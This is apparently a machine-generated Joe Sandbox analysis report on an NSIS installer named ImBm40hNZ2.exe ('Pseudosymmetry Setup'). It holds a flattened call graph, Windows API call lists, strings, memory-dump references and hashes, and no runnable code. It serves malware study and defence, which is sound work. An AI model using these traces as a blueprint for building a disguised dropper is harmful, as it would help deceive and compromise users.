401eb9 5027->5028 5030 401ecb 5028->5030 5031 405aef wsprintfA 5028->5031 5031->5030 5032 4039ac 5033 4039c4 5032->5033 5034 403aff 5032->5034 5033->5034 5035 4039d0 5033->5035 5036 403b10 GetDlgItem GetDlgItem 5034->5036 5037 403b50 5034->5037 5039 4039db SetWindowPos 5035->5039 5040 4039ee 5035->5040 5041 403e7f 19 API calls 5036->5041 5038 403baa 5037->5038 5046 401389 2 API calls 5037->5046 5042 403ecb SendMessageA 5038->5042 5047 403afa 5038->5047 5039->5040 5043 4039f3 ShowWindow 5040->5043 5044 403a0b 5040->5044 5045 403b3a SetClassLongA 5041->5045 5070 403bbc 5042->5070 5043->5044 5048 403a13 DestroyWindow 5044->5048 5049 403a2d 5044->5049 5050 40140b 2 API calls 5045->5050 5051 403b82 5046->5051 5052 403e08 5048->5052 5053 403a32 SetWindowLongA 5049->5053 5054 403a43 5049->5054 5050->5037 5051->5038 5057 403b86 SendMessageA 5051->5057 5052->5047 5063 403e39 ShowWindow 5052->5063 5053->5047 5055 403aba 5054->5055 5056 403a4f GetDlgItem 5054->5056 5062 403ee6 8 API calls 5055->5062 5060 403a62 SendMessageA IsWindowEnabled 5056->5060 5061 403a7f 5056->5061 5057->5047 5058 40140b 2 API calls 5058->5070 5059 403e0a DestroyWindow EndDialog 5059->5052 5060->5047 5060->5061 5065 403a8c 5061->5065 5067 403ad3 SendMessageA 5061->5067 5068 403a9f 5061->5068 5075 403a84 5061->5075 5062->5047 5063->5047 5064 405bb3 18 API calls 5064->5070 5065->5067 5065->5075 5066 403e7f 19 API calls 5066->5070 5067->5055 5071 403aa7 5068->5071 5072 403abc 5068->5072 5070->5047 5070->5058 5070->5059 5070->5064 5070->5066 5076 403e7f 19 API calls 5070->5076 5091 403d4a DestroyWindow 5070->5091 5074 40140b 2 API calls 5071->5074 5073 40140b 2 API calls 5072->5073 5073->5075 5074->5075 5075->5055 5100 403e58 5075->5100 5077 403c37 GetDlgItem 5076->5077 5078 403c54 ShowWindow EnableWindow 5077->5078 5079 403c4c 5077->5079 5103 403ea1 EnableWindow 5078->5103 5079->5078 5081 403c7e EnableWindow 5084 403c92 5081->5084 5082 403c97 GetSystemMenu EnableMenuItem SendMessageA 5083 403cc7 
SendMessageA 5082->5083 5082->5084 5083->5084 5084->5082 5104 403eb4 SendMessageA 5084->5104 5105 405b91 lstrcpynA 5084->5105 5087 403cf5 lstrlenA 5088 405bb3 18 API calls 5087->5088 5089 403d06 SetWindowTextA 5088->5089 5090 401389 2 API calls 5089->5090 5090->5070 5091->5052 5092 403d64 CreateDialogParamA 5091->5092 5092->5052 5093 403d97 5092->5093 5094 403e7f 19 API calls 5093->5094 5095 403da2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5094->5095 5096 401389 2 API calls 5095->5096 5097 403de8 5096->5097 5097->5047 5098 403df0 ShowWindow 5097->5098 5099 403ecb SendMessageA 5098->5099 5099->5052 5101 403e65 SendMessageA 5100->5101 5102 403e5f 5100->5102 5101->5055 5102->5101 5103->5081 5104->5084 5105->5087 5106 40192d 5107 4029fd 18 API calls 5106->5107 5108 401934 lstrlenA 5107->5108 5109 4024cb 5108->5109 5110 4024af 5111 4029fd 18 API calls 5110->5111 5112 4024b6 5111->5112 5115 405822 GetFileAttributesA CreateFileA 5112->5115 5114 4024c2 5115->5114 5116 401cb0 5117 4029e0 18 API calls 5116->5117 5118 401cc0 SetWindowLongA 5117->5118 5119 402892 5118->5119 5120 401a31 5121 4029e0 18 API calls 5120->5121 5122 401a37 5121->5122 5123 4029e0 18 API calls 5122->5123 5124 4019e1 5123->5124 5125 401e32 5126 4029fd 18 API calls 5125->5126 5127 401e38 5126->5127 5128 404e7c 25 API calls 5127->5128 5129 401e42 5128->5129 5130 405344 2 API calls 5129->5130 5131 401e48 5130->5131 5132 402663 5131->5132 5133 401e9e CloseHandle 5131->5133 5134 401e67 WaitForSingleObject 5131->5134 5138 405ef5 2 API calls 5131->5138 5133->5132 5134->5131 5135 401e75 GetExitCodeProcess 5134->5135 5136 401e90 5135->5136 5137 401e87 5135->5137 5136->5133 5140 405aef wsprintfA 5137->5140 5138->5134 5140->5136 4390 4015b3 4391 4029fd 18 API calls 4390->4391 4392 4015ba 4391->4392 4393 4056ba 4 API calls 4392->4393 4400 4015c2 4393->4400 4394 40160a 4396 401638 4394->4396 4397 40160f 4394->4397 4395 40564c CharNextA 4398 4015d0 CreateDirectoryA 4395->4398 4402 401423 25 API calls 
4396->4402 4399 401423 25 API calls 4397->4399 4398->4400 4401 4015e5 GetLastError 4398->4401 4403 401616 4399->4403 4400->4394 4400->4395 4401->4400 4404 4015f2 GetFileAttributesA 4401->4404 4407 401630 4402->4407 4408 405b91 lstrcpynA 4403->4408 4404->4400 4406 401621 SetCurrentDirectoryA 4406->4407 4408->4406 4418 402036 4419 4029fd 18 API calls 4418->4419 4420 40203d 4419->4420 4421 4029fd 18 API calls 4420->4421 4422 402047 4421->4422 4423 4029fd 18 API calls 4422->4423 4424 402051 4423->4424 4425 4029fd 18 API calls 4424->4425 4426 40205b 4425->4426 4427 4029fd 18 API calls 4426->4427 4428 402064 4427->4428 4429 40207a CoCreateInstance 4428->4429 4430 4029fd 18 API calls 4428->4430 4433 402099 4429->4433 4435 40214d 4429->4435 4430->4429 4431 401423 25 API calls 4432 402181 4431->4432 4434 40212f MultiByteToWideChar 4433->4434 4433->4435 4434->4435 4435->4431 4435->4432 5141 4014b7 5142 4014bd 5141->5142 5143 401389 2 API calls 5142->5143 5144 4014c5 5143->5144 4442 401bb8 4443 4029e0 18 API calls 4442->4443 4444 401bbf 4443->4444 4445 4029e0 18 API calls 4444->4445 4446 401bc9 4445->4446 4447 401bd9 4446->4447 4448 4029fd 18 API calls 4446->4448 4449 4029fd 18 API calls 4447->4449 4453 401be9 4447->4453 4448->4447 4449->4453 4450 401bf4 4454 4029e0 18 API calls 4450->4454 4451 401c38 4452 4029fd 18 API calls 4451->4452 4456 401c3d 4452->4456 4453->4450 4453->4451 4455 401bf9 4454->4455 4457 4029e0 18 API calls 4455->4457 4458 4029fd 18 API calls 4456->4458 4459 401c02 4457->4459 4460 401c46 FindWindowExA 4458->4460 4461 401c28 SendMessageA 4459->4461 4462 401c0a SendMessageTimeoutA 4459->4462 4463 401c64 4460->4463 4461->4463 4462->4463 5145 10002179 5146 100021de 5145->5146 5148 10002214 5145->5148 5147 100021f0 GlobalAlloc 5146->5147 5146->5148 5147->5146 4474 40243a 4475 402b07 19 API calls 4474->4475 4476 402444 4475->4476 4477 4029e0 18 API calls 4476->4477 4478 40244d 4477->4478 4479 402470 RegEnumValueA 4478->4479 4480 402464 RegEnumKeyA 4478->4480 
4482 402663 4478->4482 4481 402489 RegCloseKey 4479->4481 4479->4482 4480->4481 4481->4482 5149 404fba 5150 405167 5149->5150 5151 404fdc GetDlgItem GetDlgItem GetDlgItem 5149->5151 5153 405197 5150->5153 5154 40516f GetDlgItem CreateThread CloseHandle 5150->5154 5194 403eb4 SendMessageA 5151->5194 5156 4051c5 5153->5156 5157 4051e6 5153->5157 5158 4051ad ShowWindow ShowWindow 5153->5158 5154->5153 5155 40504d 5159 405054 GetClientRect GetSystemMetrics SendMessageA SendMessageA 5155->5159 5160 405220 5156->5160 5162 4051d5 5156->5162 5163 4051f9 ShowWindow 5156->5163 5164 403ee6 8 API calls 5157->5164 5196 403eb4 SendMessageA 5158->5196 5165 4050c3 5159->5165 5166 4050a7 SendMessageA SendMessageA 5159->5166 5160->5157 5167 40522d SendMessageA 5160->5167 5168 403e58 SendMessageA 5162->5168 5170 405219 5163->5170 5171 40520b 5163->5171 5169 4051f2 5164->5169 5174 4050d6 5165->5174 5175 4050c8 SendMessageA 5165->5175 5166->5165 5167->5169 5176 405246 CreatePopupMenu 5167->5176 5168->5157 5173 403e58 SendMessageA 5170->5173 5172 404e7c 25 API calls 5171->5172 5172->5170 5173->5160 5178 403e7f 19 API calls 5174->5178 5175->5174 5177 405bb3 18 API calls 5176->5177 5179 405256 AppendMenuA 5177->5179 5180 4050e6 5178->5180 5181 405274 GetWindowRect 5179->5181 5182 405287 TrackPopupMenu 5179->5182 5183 405123 GetDlgItem SendMessageA 5180->5183 5184 4050ef ShowWindow 5180->5184 5181->5182 5182->5169 5186 4052a3 5182->5186 5183->5169 5185 40514a SendMessageA SendMessageA 5183->5185 5187 405112 5184->5187 5188 405105 ShowWindow 5184->5188 5185->5169 5189 4052c2 SendMessageA 5186->5189 5195 403eb4 SendMessageA 5187->5195 5188->5187 5189->5189 5190 4052df OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5189->5190 5192 405301 SendMessageA 5190->5192 5192->5192 5193 405323 GlobalUnlock SetClipboardData CloseClipboard 5192->5193 5193->5169 5194->5155 5195->5183 5196->5156 5197 40223b 5198 402243 5197->5198 5203 402249 5197->5203 5200 4029fd 18 API calls 5198->5200 5199 402259 
5202 402267 5199->5202 5204 4029fd 18 API calls 5199->5204 5200->5203 5201 4029fd 18 API calls 5201->5199 5205 4029fd 18 API calls 5202->5205 5203->5199 5203->5201 5204->5202 5206 402270 WritePrivateProfileStringA 5205->5206 5207 4042bd 5208 4042e9 5207->5208 5209 4042fa 5207->5209 5268 405389 GetDlgItemTextA 5208->5268 5211 404306 GetDlgItem 5209->5211 5217 404365 5209->5217 5213 40431a 5211->5213 5212 4042f4 5215 405dfc 5 API calls 5212->5215 5216 40432e SetWindowTextA 5213->5216 5223 4056ba 4 API calls 5213->5223 5214 404449 5266 4045e4 5214->5266 5270 405389 GetDlgItemTextA 5214->5270 5215->5209 5219 403e7f 19 API calls 5216->5219 5217->5214 5220 405bb3 18 API calls 5217->5220 5217->5266 5224 40434a 5219->5224 5225 4043d9 SHBrowseForFolderA 5220->5225 5221 404479 5226 40570f 18 API calls 5221->5226 5222 403ee6 8 API calls 5227 4045f8 5222->5227 5228 404324 5223->5228 5229 403e7f 19 API calls 5224->5229 5225->5214 5230 4043f1 CoTaskMemFree 5225->5230 5231 40447f 5226->5231 5228->5216 5234 405621 3 API calls 5228->5234 5232 404358 5229->5232 5233 405621 3 API calls 5230->5233 5271 405b91 lstrcpynA 5231->5271 5269 403eb4 SendMessageA 5232->5269 5236 4043fe 5233->5236 5234->5216 5239 404435 SetDlgItemTextA 5236->5239 5243 405bb3 18 API calls 5236->5243 5238 40435e 5241 405ebc 3 API calls 5238->5241 5239->5214 5240 404496 5242 405ebc 3 API calls 5240->5242 5241->5217 5244 40449e 5242->5244 5245 40441d lstrcmpiA 5243->5245 5246 4044d8 5244->5246 5253 405668 2 API calls 5244->5253 5255 404529 5244->5255 5245->5239 5248 40442e lstrcatA 5245->5248 5272 405b91 lstrcpynA 5246->5272 5248->5239 5249 4044df 5250 4056ba 4 API calls 5249->5250 5251 4044e5 GetDiskFreeSpaceA 5250->5251 5254 404507 MulDiv 5251->5254 5251->5255 5253->5244 5254->5255 5256 404593 5255->5256 5257 404665 21 API calls 5255->5257 5258 4045b6 5256->5258 5260 40140b 2 API calls 5256->5260 5259 404585 5257->5259 5273 403ea1 EnableWindow 5258->5273 5262 404595 SetDlgItemTextA 5259->5262 5263 40458a 
5259->5263 5260->5258 5262->5256 5265 404665 21 API calls 5263->5265 5264 4045d2 5264->5266 5267 404252 SendMessageA 5264->5267 5265->5256 5266->5222 5267->5266 5268->5212 5269->5238 5270->5221 5271->5240 5272->5249 5273->5264 4501 40173f 4502 4029fd 18 API calls 4501->4502 4503 401746 4502->4503 4504 401764 4503->4504 4505 40176c 4503->4505 4541 405b91 lstrcpynA 4504->4541 4542 405b91 lstrcpynA 4505->4542 4508 40176a 4512 405dfc 5 API calls 4508->4512 4509 401777 4510 405621 3 API calls 4509->4510 4511 40177d lstrcatA 4510->4511 4511->4508 4517 401789 4512->4517 4513 4017ca 4515 4057fd 2 API calls 4513->4515 4514 405e95 2 API calls 4514->4517 4515->4517 4517->4513 4517->4514 4518 4017a0 CompareFileTime 4517->4518 4519 401864 4517->4519 4520 40183b 4517->4520 4523 405b91 lstrcpynA 4517->4523 4529 405bb3 18 API calls 4517->4529 4535 4053a5 MessageBoxIndirectA 4517->4535 4540 405822 GetFileAttributesA CreateFileA 4517->4540 4518->4517 4521 404e7c 25 API calls 4519->4521 4522 404e7c 25 API calls 4520->4522 4539 401850 4520->4539 4524 40186e 4521->4524 4522->4539 4523->4517 4525 402e62 33 API calls 4524->4525 4526 401881 4525->4526 4527 401895 SetFileTime 4526->4527 4528 4018a7 CloseHandle 4526->4528 4527->4528 4530 4018b8 4528->4530 4528->4539 4529->4517 4531 4018d0 4530->4531 4532 4018bd 4530->4532 4534 405bb3 18 API calls 4531->4534 4533 405bb3 18 API calls 4532->4533 4536 4018c5 lstrcatA 4533->4536 4537 4018d8 4534->4537 4535->4517 4536->4537 4538 4053a5 MessageBoxIndirectA 4537->4538 4538->4539 4540->4517 4541->4508 4542->4509 5274 40163f 5275 4029fd 18 API calls 5274->5275 5276 401645 5275->5276 5277 405e95 2 API calls 5276->5277 5278 40164b 5277->5278 5279 40193f 5280 4029e0 18 API calls 5279->5280 5281 401946 5280->5281 5282 4029e0 18 API calls 5281->5282 5283 401950 5282->5283 5284 4029fd 18 API calls 5283->5284 5285 401959 5284->5285 5286 40196c lstrlenA 5285->5286 5287 4019a7 5285->5287 5288 401976 5286->5288 5288->5287 5292 405b91 lstrcpynA 5288->5292 5290 
401990 5290->5287 5291 40199d lstrlenA 5290->5291 5291->5287 5292->5290

Control-flow Graph

APIs
• #17.COMCTL32 ref: 00403103
• SetErrorMode.KERNELBASE(00008001), ref: 0040310E
• OleInitialize.OLE32(00000000), ref: 00403115
  • Part of subcall function 00405EBC: GetModuleHandleA.KERNEL32(?,?,?,00403127,00000008), ref: 00405ECE
  • Part of subcall function 00405EBC: LoadLibraryA.KERNELBASE(?,?,?,00403127,00000008), ref: 00405ED9
  • Part of subcall function 00405EBC: GetProcAddress.KERNEL32(00000000,?), ref: 00405EEA
• SHGetFileInfoA.SHELL32(004287E0,00000000,?,00000160,00000000,00000008), ref: 0040313D
  • Part of subcall function 00405B91: lstrcpynA.KERNEL32(?,?,00000400,00403152,Pseudosymmetry Setup,NSIS Error), ref: 00405B9E
                                                                                                                                                                                                                                                                • GetCommandLineA.KERNEL32(Pseudosymmetry Setup,NSIS Error), ref: 00403152
                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\ImBm40hNZ2.exe",00000000), ref: 00403165
                                                                                                                                                                                                                                                                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\ImBm40hNZ2.exe",00000020), ref: 00403190
                                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040328D
                                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040329E
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032AA
                                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032BE
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004032C6
                                                                                                                                                                                                                                                                • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004032D7
                                                                                                                                                                                                                                                                • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004032DF
                                                                                                                                                                                                                                                                • DeleteFileA.KERNELBASE(1033), ref: 004032F3
                                                                                                                                                                                                                                                                • OleUninitialize.OLE32(?), ref: 004033A1
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 004033C1
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\ImBm40hNZ2.exe",00000000,?), ref: 004033CD
                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004033D9
                                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004033E5
                                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004033EC
                                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(004283E0,004283E0,?,0042F000,?), ref: 00403445
                                                                                                                                                                                                                                                                • CopyFileA.KERNEL32(C:\Users\user\Desktop\ImBm40hNZ2.exe,004283E0,00000001), ref: 00403459
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,004283E0,004283E0,?,004283E0,00000000), ref: 00403486
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,?), ref: 004034DB
                                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403517
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0040353A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                • String ID: "$"C:\Users\user\Desktop\ImBm40hNZ2.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens$C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit$C:\Users\user\Desktop$C:\Users\user\Desktop\ImBm40hNZ2.exe$Error launching installer$Low$NSIS Error$Pseudosymmetry Setup$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
control_flow_graph 251 405bb3-405bbe
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetVersion.KERNEL32(?,00429000,00000000,00404EB4,00429000,00000000), ref: 00405C64
                                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405CDF
                                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405CF2
                                                                                                                                                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,0041AFD0), ref: 00405D2E
                                                                                                                                                                                                                                                                • SHGetPathFromIDListA.SHELL32(0041AFD0,Call), ref: 00405D3C
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(0041AFD0), ref: 00405D47
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D69
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(Call,?,00429000,00000000,00404EB4,00429000,00000000), ref: 00405DBB
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                                                                                                                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$XRS$\Microsoft\Internet Explorer\Quick Launch

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
control_flow_graph 313 405451-405477
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,756A3410,00000000), ref: 0040547A
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(0042A828,\*.*,0042A828,?,?,C:\Users\user\AppData\Local\Temp\,756A3410,00000000), ref: 004054C2
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00409014,?,0042A828,?,?,C:\Users\user\AppData\Local\Temp\,756A3410,00000000), ref: 004054E3
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00409014,?,0042A828,?,?,C:\Users\user\AppData\Local\Temp\,756A3410,00000000), ref: 004054E9
                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(0042A828,?,?,?,00409014,?,0042A828,?,?,C:\Users\user\AppData\Local\Temp\,756A3410,00000000), ref: 004054FA
                                                                                                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004055A7
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004055B8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • \*.*, xrefs: 004054BC
                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040545F
                                                                                                                                                                                                                                                                • "C:\Users\user\Desktop\ImBm40hNZ2.exe", xrefs: 00405451
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\ImBm40hNZ2.exe"$C:\Users\user\AppData\Local\Temp\$\*.*

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
                                                                                                                                                                                                                                                                • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
                                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCreateValuelstrlen
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00407490,?,00000001,00407480,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040208B
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407480,?,?), ref: 00402143
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit, xrefs: 004020CB
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,?,?,00403127,00000008), ref: 00405ECE
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(?,?,?,00403127,00000008), ref: 00405ED9
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00405EEA
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 310444273-0
                                                                                                                                                                                                                                                                • Opcode ID: 6a16e0dd3cc6108475a6e7adf37e54332756fcc3f7317002038e5d5bd84af621
                                                                                                                                                                                                                                                                • Instruction ID: 664a0ab70e0d061655fae0e19733d53a5cade881539b1a7a2127248cbf20f03b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a16e0dd3cc6108475a6e7adf37e54332756fcc3f7317002038e5d5bd84af621
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34E0C232A04511ABC7109B74EC08A7B73A8EF88650304893EF541F7151DB34BC11ABEE
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileA.KERNELBASE(?,0042B070,0042AC28,00405752,0042AC28,0042AC28,00000000,0042AC28,0042AC28,?,?,756A3410,00405471,?,C:\Users\user\AppData\Local\Temp\,756A3410), ref: 00405EA0
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00405EAC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                • Opcode ID: 45004ede6c553f1c155b4d32efd02d1a694f01ec3798d929b8bcbd89b235e1a6
                                                                                                                                                                                                                                                                • Instruction ID: beb1acdad78be98fe1ce0201480667c0c5eddde0777449e7049f749fb66a5638
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45004ede6c553f1c155b4d32efd02d1a694f01ec3798d929b8bcbd89b235e1a6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EDD01232D0E4309BD3115B38AC0C84BBA58DB053317608B33B8A5F13E0D3349D529AED
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 00402654
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
